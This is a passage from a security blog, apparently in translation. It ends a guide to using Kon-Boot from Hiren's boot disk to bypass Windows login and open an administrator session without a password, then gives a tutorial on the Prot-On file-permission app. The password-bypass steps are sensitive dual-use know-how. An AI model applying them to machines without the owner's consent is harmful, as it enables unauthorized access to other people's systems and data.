  • Microsoft Windows Server 2008 32Bit / 64Bit
  • Microsoft Windows Vista 32Bit / 64Bit
  • Microsoft Windows 7 32Bit / 64Bit
  • Microsoft Windows 8 32Bit / 64Bit (BIOS version, not EFI)
  • Some Linux systems.

To use it, we must start our equipment with Hiren’s boot and select the «Password Reset» section and there select Kon-Bot.

An ascii animation will open, in which we must press enter to continue.

And the program will begin to patch the necessary files, to then start the operating system as administrator, without having to do anything else.

With this, we can now access our system without the need for a password.

We can also try to hack the administrator password, and enter directly with it, the manual we already did, you have it here: Hack Windows administrator: Enter Windows administrator account without administrator password

Categories
Seguridad Informática

Protect and easily manage the permissions of your personal files

In this short tutorial we are going to teach you how to use the Prot-On program and above all we will show you what it is for, since it is a fairly new application.

Prot-On is an application that allows us to manage in a way efficient and secure files that we share, being able to know who, how and when they access them.

Prot-On is available for Windows, Mac, iOS, and Android. We can test it from your main website.

The first thing we must do is register on their website to start using the program. To do this, we click on «Register in Prot-On» and fill in the form that appears.

They will send us an email to our email address to confirm the account, and we can start using Prot-On.

To do this, we download the application on our device Android from the Play Store.

Once installed, it will create an icon in the applications menu, to run the application we press on it.

The user license will appear, which we must accept, and a window will appear asking us if we are new users or if we are already registered. If we have previously registered, click on “I am already a user” and 2 boxes will appear to enter our username and password.

We introduce them and a short quick introduction guide will appear. We click on next several times until we get to the main window of the program.

To share and protect an image, we must click on the third button at the top right of the screen, and the album will open to be able to navigate through the images saved on our device. We select the image we want, and, automatically, it will be shared and protected.

If we click on the saved image, a preview of the image will open, and a menu at the top right. If we click on the key-shaped icon, we agree to manage the photo’s permissions.

We can also share the image with Dropbox or send it by mail safely, and if we click on the clock-shaped button, we access a web browser that opens an activity window where we can see the activity that the protected image has had.

We can also delete the shared image by clicking on the trash can icon.

From the Prot-On website we can access our shared files easily, as well as have a better management of the permissions and activity of our files.

We can also create groups of Prot-On users with whom to share files.

Prot-On has a limited free version, and a license of € 40 per year that extends the permissions to editing, copying and management.

Prot-On has reminded us a lot of a Google Drive, where you can give permissions to the files so that people can see, edit or not have access to them. If we remove permissions from there, a person cannot see it (to see the files we must be connected to the internet).

If we want the watch offline, we must purchase the premium version, and specify a certain time in which they can see the file, when that time expires, we will have to have an internet connection again.

You have practical examples in your main website.

Manual made by Rubén Velasco (ruvelro) for RedesZone.net.

Manual exclusively for RedesZone.net

Its total or partial reproduction without the consent of the author.